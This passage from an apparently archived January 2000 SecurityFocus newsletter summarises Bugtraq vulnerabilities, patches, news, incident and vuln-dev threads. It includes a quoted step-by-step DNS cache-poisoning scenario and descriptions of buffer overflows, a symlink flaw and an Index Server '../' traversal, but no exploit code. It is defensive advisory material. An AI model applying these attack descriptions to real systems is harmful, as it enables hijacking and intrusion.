processes (hence the name). It's typical benefit is quicker access to memory hence more streamlined operations. As noted previously certain implementations have a serious vulnerability. In short, the vulnerability is that users may manipulate processes under system which use /proc to gain root privileges. The full details are covered at length in the advisory attached to the 'Credit' section of this vulnerability entry. 2. DNS TLD & Out of Zone NS Domain Hijacking BugTraq ID: 941 Remote: Yes Date Published: 2000-01-23 Relevant URL: http://www.securityfocus.com/bid/941 Summary: A vulnerability exists in the mechanism used by DNS, in general, to determine the name server associated with TLD's (top level domains). DNS is built upon levels of trust, and by exploiting single points of failure in this trust system, it becomes possible for an attacker to convince a caching nameserver that allows for recursion through it that the root server for a given TLD is something other than what it actually is. By consecutively performing these cache attacks, it could be possible for an attacker to entirely take over name service for any given domain. The vulnerability is actually not specific to TLD's. The same attack can be used to hijack any domain which has out of zone NS records, if any of the servers that act as the name server for the out of zone domain can be compromised. The simplest explanation was presented in the example provided by it's discoverer, Dan Bernstein, on the Bugtraq mailing list, on January 23, 2000: "Suppose an attacker can make recursive queries through your cache. Let me emphasize that this does not mean that the attacker is one of your beloved users; many programs act as DNS query-tunneling tools. Suppose the attacker is also able, somehow, to take over ns2.netsol.com. This isn't one of the .com servers, but it's a name server for the gtld-servers.net domain. Here's what happens: (1) The attacker asks your cache about z.com. Your cache contacts (say) k.root-servers.net, which provides a referral: com NS j.gtld-servers.net (among others) j.gtld-servers.net A 198.41.0.21 These records are cached. (2) The attacker asks your cache about z.gtld-servers.net. Your cache contacts (say) f.root-servers.net, which provides a referral: gtld-servers.net NS ns2.netsol.com (among others) ns2.netsol.com A 207.159.77.19 These records are cached. (3) The attacker takes over ns2.netsol.com. (4) The attacker asks your cache about zz.gtld-servers.net. Your cache contacts ns2.netsol.com, and the attacker answers: zz.gtld-servers.net CNAME j.gtld-servers.net j.gtld-servers.net A 1.2.3.4 These records are cached, wiping out the obsolete j glue. (5) A legitimate user asks your cache about yahoo.com. Your cache contacts j.gtld-servers.net, and the attacker answers: yahoo.com A 1.2.3.4 The user contacts yahoo.com at that address." The attack offered requires that an attacker be able to compromise the operation of the DNS server running on, in this case, ns2.netsol.com, although this is not the only server that could potentially be used to launch an attack of this style. The author further indicates that there are in excess of 200 servers that could be used to manipulate resolution of all the .COM domains. 3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability BugTraq ID: 942 Remote: Yes Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/942 Summary: Vpopmail (vchkpw) is free GPL software package built to help manage virtual domains and non /etc/passwd email accounts on Qmail mail servers. This package is developed by Inter7 (Referenced in the 'Credit' section) and is not shipped, maintained or supported by the main Qmail distribution. Certain versions of this software are vulnerable to a remote buffer overflow attack in the password authentication of vpopmail. 4. VMware Symlink Vulnerability BugTraq ID: 943 Remote: No Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/943 Summary: VMware is software that runs multiple virtual computers on a single PC, at the same time, without partitioning or rebooting. Certain versions of the VMWare for Linux product do not perform /tmp file sanity checking and create files in the /tmp directory which will follow symlinks. This may be used by a malicious user to overwrite any file (with log data) which falls within the write permissions of the user ID which VMWare excecutes as. Typically this is root. This attack will most likely result in a denial of service and not a root level compromise. 5. HP Path MTU Discovery DoS Vulnerability BugTraq ID: 944 Remote: Yes Date Published: 2000-01-24 Relevant URL: http://www.securityfocus.com/bid/944 Summary: A potential denial of service exists in Hewlett-Packard's proprietary protocol for discovering the maximum path MTU (PMTU) for a give connection. This feature could potentially be used to cause denial of services, using HPUX machines as "amplifiers." Essentially, HP machines which are vulnerable can, under certain conditions, be coerced in to sending far more data outbound than they receive inbound. By forging source addresses, it is possible to send a small quantity of packets purporting to be from a given source, and cause the HPUX machine to send multiple packets in response. This could potentially be used as a denial of service. HP's proprietary path discover protocol works by sending data in parallel with ICMP packets being used for path discovery. While exact details of the nature of the denial of service were not made public, presumably it could be possible to utilize UDP packets, and default UDP services to start the chain of events leading to a denial of service 6. Microsoft East Asian Word Conversion Vulnerability BugTraq ID: 946 Remote: No Date Published: 2000-01-20 Relevant URL: http://www.securityfocus.com/bid/946 Summary: East Asian language versions of Word and Powerpoint are susceptible to a buffer overflow exploit. The overflowable buffer is in the code that converts Word 5 documents into newer formats. Word 97, 98, and 2000 will automatically convert older files into the new format upon loading. If a specially-modified Chinese, Japanese or Korean Word 5 document is loaded into a newer version of Word or PowerPoint, arbitrary code can be executed during the conversion process, at the privilege level of the current user. 7. NT RDISK Registry Enumeration File Vulnerability BugTraq ID: 947 Remote: No Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/947 Summary: The Rdisk utility shipped with all versions of Windows NT4.0 is used to make an Emergency Repair Disk. During the creation of this disk, a temporary file ($$hive$$.tmp) is created in the %systemroot%\repair directory that contains the registry hives while they are being backed up. The group Everyone has Read permission to this file, and in this manner sensitive information about the server could be leaked. The file is put in a location that is not shared by default, and is removed immediately after the disk is created. The only likely scenario where this could be exploited is in the case of NT Terminal Server, where an administrator and a regular user could both be logged in interactively at the same time. 8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability BugTraq ID: 948 Remote: Yes Date Published: 2000-01-26 Relevant URL: http://www.securityfocus.com/bid/948 Summary: There is a remotely exploitable buffer overflow in Qaulcomm's 'qpopper' daemon which allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon. The problem lies in the code to handles the 'LIST' command available to logged in users. By providing an overly long user supplied argument a buffer may be overflowed resulting in the attacker gaining access with the user ID (UID) of the user who's account is being used for the attack and the group ID (GID) mail. This will result in remote access to the server itself and possibly (depending on how the machine is configured) access to read system users mail via the GID mail. 9. NT Index Server Directory Traversal Vulnerability BugTraq ID: 950 Remote: Yes Date Published: 2000-01-26 Relevant URL: http://www.securityfocus.com/bid/950 Summary: Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services. When combined with IIS, Index Server and Indexing Services include the ability to view web search results in their original context. It will generate an html page showing the query terms in a short excerpt of the surrounding text for each page returned, along with a link to that page. This is known as "Hit Highlighting". To do this, it supports the .htw filetype which is handled by the webhits.dll ISAPI application. This dll will allow the use of the '../' directory traversal string in the selection of a template file. This will allow for remote, unauthenticated viewing of any file on the system whose location is known by the attacker. III. PATCH UPDATES 2000-01-24 to 2000-01-30 ------------------------------------------- 1. Vendor: Qualcomm Product: Qpopper Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow Bugtraq ID: 948 Relevant URLS: http://www.eudora.com/freeware/qpop.html#BUFFER http://www.securityfocus.com/bid/948 Patch Location: ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper3.0b31.tar.Z 2. Vendor: Microsoft Product: Index Server for Windows NT and 2000 Vulnerability Patched: NT Index Server Directory Traversal Bugtraq ID: 950 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/950 Patch Locations: Index Server 2.0: Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727 Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728 Indexing Services for Windows 2000: Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726 3. Vendor: OpenBSD Product: OpenBSD Vulnerability Patched: Multiple Vendor BSD /proc File Sytem Bugtraq ID: 940 Relevant URLS: http://www.openbsd.org/errata.html http://www.securityfocus.com/bid/940 Patch Location: http://www.openbsd.org/errata.html#procfs 4. Vendor: FreeBSD Product: FreeBSD Vulnerability Patched: Multiple Vendor BSD /proc File Sytem Bugtraq ID: 940 Relevant URLS: http://www.freebsd.org/security/ http://www.securityfocus.com/bid/940 Patch Location: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:02/procfs.patch 5. Vendor: Inter7 Product: vpopmail Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow Bugtraq ID: 942 Relevant URLS: http://www.inter7.com/ http://www.securityfocus.com/bid/942 Patch Location: http://www.inter7.com/vpopmail/ (version 3.1.11e) 6. Vendor: Microsoft Product: NT 4.0 Terminal Server Edition Vulnerability Patched: NT RDISK Registry Enumeration File Bugtraq ID: 947 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/947 Patch Location: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17384 7. Vendor: Microsoft Product: Office (All versions, including word and powerpoint) Vulnerability Patched: Microsoft East Asian Word Conversion Bugtraq ID: 946 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/946 Patch Locations: - Word 97 or 98, PowerPoint 98: - US: http://officeupdate.microsoft.com/downloaddetails/ww5pkg.htm Japan: http://officeupdate.microsoft.com/japan/downloaddetails/MalformedData-97.htm Korea: http://officeupdate.microsoft.com/korea/downloaddetails/MalformedData-97.htm China: http://officeupdate.microsoft.com/china/downloaddetails/MalformedData-97.htm Taiwan: http://officeupdate.microsoft.com/taiwan/downloaddetails/MalformedData-97.htm Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/MalformedData-97.htm - Converter Pack 2000; Office 2000 with Multilanguage Pack; Word 2000, PowerPoint 2000: - US: http://officeupdate.microsoft.com/2000/downloaddetails/ww5pkg.htm Japan: http://officeupdate.microsoft.com/japan/downloaddetails/2000/MalformedData-2K.htm Korea: http://officeupdate.microsoft.com/korea/downloaddetails/2000/MalformedData-2K.htm China: http://officeupdate.microsoft.com/china/downloaddetails/2000/MalformedData-2K.htm Taiwan: http://officeupdate.microsoft.com/taiwan/downloaddetails/2000/MalformedData-2K.htm Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/2000/MalformedData-2K.htm 8. Vendor: FreeBSD Product: FreeBSD Vulnerability Patched: Multiple Vendor BSD make /tmp Race Condition Bugtraq ID: 939 Relevant URLS: http://www.freebsd.org/security http://www.securityfocus.com/bid/939 Patch locations: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:01/make.patch IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES ----------------------------------------- 1. Outpost Leaves Data Unguarded (Mon Jan 24 2000) Excerpt: While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too. Relevant URL: http://www.wired.com/news/technology/0,1282,33842,00.html 2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000) Excerpt: Japan said on Tuesday it will seek help from the United States in an investigation into hackers who penetrated two government Web sites. Relevant URL: http://news.excite.com/news/r/000125/00/net-japan-hackers 3. Task Force Battles Online Criminals (Wed Jan 26 2000) Excerpt: Ground zero in California's war against Internet crime is behind a dumpster hard by a hamburger stand in a faded Sacramento County welfare building. This is the headquarters of the Sacramento Valley high-tech task force, a multi-agency law enforcement team dedicated to tracking down e-crime, from stock swindlers to child pornographers. Relevant URL: http://www.latimes.com/news/asection/20000126/t000008196.html 4. Smart card 'inventor' lands in jail (Thu Jan 27 2000) Excerpt: In another case destined to fuel e-commerce anxieties, a Parisian computer programmer is facing counterfeiting and fraud charges after developing a homemade "smart card" that he says gave him the ability to fraudulently purchase goods and services throughout France. Relevant URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2428429,00.html?chkpt=zdnnstop 5. Visa acknowledges cracker break-ins (Fri Jan 28 2000) Excerpt: Visa International Inc. acknowledged this week that computer crackers broke into several servers in its global network last July and stole information. The company said that in December, it received a phone call and an e-mail demanding money in exchange for the data. Relevant URL: http://www.computerworld.com/home/print.nsf/all/000128e45a 6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000) Excerpt: In its review of the last 12 months, Sophos, the IT security firm, says that 1999 turned out to be a year when mass-mailed viruses arrived and dominated the scene. The annual review says that virus writers are now taking advantage of the Internet and corporate e-mail systems to distribute their creations more quickly. Relevant URL: http://www.currents.net/newstoday/00/01/28/news8.html V. INCIDENTS SUMMARY 2000-01-24 to 2000-01-30 --------------------------------------------- 1. Got scanned again (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=388C09A6.8EB8CC47@scalajwt.ro 2. Unusual scan pattern (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001241252.G29957@bluebottle.itss 3. Possible Probe = Possible Malfunction (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.3.32.20000125180337.008613b0@mail.9netave.com 4. No Idea (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3926668584.948819473@pc27233.utdallas.edu 5. PC Anywhere client seems to probe class C of connected networks (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.21.0001251657260.10263-100000@barrel.dt.ecosoft.com 6. unapproved AXFR (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001251742.C24564@bluebottle.itss 7. Connect thru PIX & ports 1727, 2209, 9200 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=D6C7B533F7C4D311BBD800001D121E7F0151D2@clmail.cmccontrols.com 8. Anti-Death Penalty (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001271722320.19098-100000@wr5z.localdomain 9. Strange DNS/TCP activity (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000127205611.23795.qmail@securityfocus.com 10. eri? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=200001281146.FAA20359@hank.cs.utexas.edu 11. source port 321 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=25608573.949079326302.JavaMail.imail@cheeks.excite.com 12. Korea (again) (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000128080948.A24408@sec.sprint.net 13. BOGUS.IvCD File (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=389071D7.6A217C7C@relaygroup.com 14. port 768 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=87u2jyvahi.fsf@wiz.wiz 15. Extrange named messages (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.6.32.20000128103026.009ab760@mail.inforeti 16. Probes to tcp 2766 ('System V Listner') (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001281650150.29437-100000@unreal.sekure.org 17. Possible attempt at hacking? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=004701bf6934$22f4fd00$6500a8c0@techstart.com.au 18. DNS update queries: another sort of suspicious activity. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.05.10001281604430.24882-100000@ns.kyrnet.kg VI. VULN-DEV RESEARCH LIST SUMMARY 2000-01-24 to 2000-01-30 ---------------------------------------------------------- 1. Shadow (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.21.0001250033010.7776-100000@stormbringer.eos.ncsu.edu 2. things to break.. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.BSF.4.05.10001251139570.30155-100000@mail.us.netect.com 3. HTTP scanners? (summary, long) (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=388FD01F.A28F15BC@thievco.com 4. CGI insecurities (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.10.10001271034400.25323-100000@analog.rm-r.net 5. ICQ Pass Cracker. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=200001270941.UAA21537@buffy.tpgi.com.au 6. File Share Vacuum (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=18708.000128@frisurf.no 7. IIS4.0 .htw vulnerability (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4C95EE93836DD311AAA200805FED978904F2DB@mercury.globalintegrity.com 8. Napster a little insecure? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4.2.0.58.20000128171020.009c8ee0@mail.openline.com.br 9. distributed.net and seti@home (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=NDBBJPBMKLJJBCHBNEAIKECOCBAA.jlintz@optonline.net VII. SECURITY JOBS SUMMARY 2000-01-24 to 2000-01-30 --------------------------------------------------- Seeking Employment: 1. Prashant V